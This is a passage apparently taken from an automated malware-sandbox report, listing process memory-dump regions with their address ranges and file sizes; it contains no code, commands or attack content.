                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                444KB

                                                                                                                                                                                                                                                                              • memory/2108-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/2152-188-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4.9MB

                                                                                                                                                                                                                                                                              • memory/2152-186-0x0000000000900000-0x0000000000A4A000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                              • memory/2152-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/2364-218-0x0000013FA6640000-0x0000013FA66B1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                452KB

                                                                                                                                                                                                                                                                              • memory/2380-197-0x000001E1BB560000-0x000001E1BB5D1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                452KB

                                                                                                                                                                                                                                                                              • memory/2400-379-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/2400-380-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                340KB

                                                                                                                                                                                                                                                                              • memory/2424-330-0x0000000004910000-0x00000000049AD000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                628KB

                                                                                                                                                                                                                                                                              • memory/2424-346-0x0000000000400000-0x0000000002CBF000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                40.7MB

                                                                                                                                                                                                                                                                              • memory/2424-265-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/2596-198-0x0000016AA1910000-0x0000016AA1981000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                452KB

                                                                                                                                                                                                                                                                              • memory/2672-226-0x000001DFC3100000-0x000001DFC3171000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                452KB

                                                                                                                                                                                                                                                                              • memory/2692-225-0x0000024ADA440000-0x0000024ADA4B1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                452KB

                                                                                                                                                                                                                                                                              • memory/2708-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/2720-280-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/2740-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3112-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3144-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3276-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3364-185-0x0000000000400000-0x0000000000896000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4.6MB

                                                                                                                                                                                                                                                                              • memory/3364-183-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                              • memory/3364-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3560-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3612-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3716-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3856-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3928-309-0x0000000000400000-0x000000000067D000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                2.5MB

                                                                                                                                                                                                                                                                              • memory/3928-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3940-132-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                152KB

                                                                                                                                                                                                                                                                              • memory/3940-131-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                                                              • memory/3940-136-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                                                              • memory/3940-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/3940-135-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                                                              • memory/3940-130-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                572KB

                                                                                                                                                                                                                                                                              • memory/3940-133-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                                                              • memory/3940-143-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                                                              • memory/3940-134-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                                                              • memory/4032-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4108-282-0x00000000031D0000-0x00000000031D1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4108-286-0x0000000001770000-0x0000000001771000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4108-272-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4108-279-0x0000000005870000-0x0000000005871000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4108-190-0x0000000004241000-0x0000000004342000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                              • memory/4108-191-0x0000000000DB0000-0x0000000000E0D000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                372KB

                                                                                                                                                                                                                                                                              • memory/4108-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4108-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4120-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4152-306-0x0000000000418E3E-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4152-313-0x0000000005720000-0x0000000005721000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4152-304-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                                              • memory/4152-320-0x00000000059E0000-0x00000000059E1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4152-316-0x0000000005650000-0x0000000005C56000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                6.0MB

                                                                                                                                                                                                                                                                              • memory/4152-310-0x0000000005C60000-0x0000000005C61000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4152-315-0x0000000005760000-0x0000000005761000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4152-312-0x00000000056C0000-0x00000000056C1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4188-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4192-178-0x00007FF6E4F44060-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4192-184-0x00000135F7C00000-0x00000135F7C71000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                452KB

                                                                                                                                                                                                                                                                              • memory/4200-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4416-351-0x0000029102FC0000-0x000002910308F000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                828KB

                                                                                                                                                                                                                                                                              • memory/4416-350-0x0000029102F50000-0x0000029102FBE000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                440KB

                                                                                                                                                                                                                                                                              • memory/4416-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4580-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4580-325-0x0000000002C70000-0x0000000002D1E000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                696KB

                                                                                                                                                                                                                                                                              • memory/4612-354-0x0000000007CE0000-0x0000000007CE1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4612-347-0x0000000006E40000-0x0000000006E41000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4612-375-0x00000000071D0000-0x00000000071D1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4612-344-0x0000000007500000-0x0000000007501000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4612-363-0x0000000007EA0000-0x0000000007EA1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4612-343-0x0000000006E90000-0x0000000006E91000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4612-328-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4612-361-0x0000000007D50000-0x0000000007D51000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4612-370-0x0000000008010000-0x0000000008011000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4612-349-0x0000000006E42000-0x0000000006E43000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4664-382-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                              • memory/4664-377-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4736-275-0x0000000000780000-0x0000000000781000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4736-271-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/4736-281-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4736-278-0x0000000005540000-0x0000000005541000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4736-287-0x0000000005240000-0x0000000005241000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/4736-288-0x0000000005040000-0x000000000553E000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                5.0MB

                                                                                                                                                                                                                                                                              • memory/4852-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5020-268-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5020-319-0x0000000000400000-0x000000000325A000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                46.4MB

                                                                                                                                                                                                                                                                              • memory/5020-311-0x0000000003260000-0x00000000033AA000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                              • memory/5052-336-0x0000000004CF3000-0x0000000004CF4000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/5052-348-0x0000000004CF4000-0x0000000004CF6000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                              • memory/5052-332-0x0000000000400000-0x0000000002C7B000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                40.5MB

                                                                                                                                                                                                                                                                              • memory/5052-333-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/5052-337-0x0000000004C40000-0x0000000004C5A000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                104KB

                                                                                                                                                                                                                                                                              • memory/5052-335-0x0000000004CF2000-0x0000000004CF3000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                              • memory/5052-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5052-323-0x0000000004750000-0x000000000477F000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                188KB

                                                                                                                                                                                                                                                                              • memory/5052-329-0x0000000004B90000-0x0000000004BAB000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                108KB

                                                                                                                                                                                                                                                                              • memory/5060-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5064-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5076-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5076-318-0x0000000000400000-0x00000000008AA000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                                                                                              • memory/5076-317-0x00000000009E0000-0x0000000000B2A000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                              • memory/5088-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5100-365-0x0000000000400000-0x0000000000D41000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                9.3MB

                                                                                                                                                                                                                                                                              • memory/5100-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5100-366-0x0000000002E20000-0x0000000003746000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                9.1MB

                                                                                                                                                                                                                                                                              • memory/5112-324-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                              • memory/5112-326-0x0000000000402E1A-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5156-381-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5156-384-0x0000000003920000-0x000000000395C000-memory.dmp
                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                240KB

                                                                                                                                                                                                                                                                              • memory/5228-385-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5244-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5348-393-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5392-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5424-399-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5472-464-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5508-468-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5568-470-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5628-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5704-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5720-474-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5820-475-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5840-427-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                              • memory/5952-476-0x0000000000000000-mapping.dmp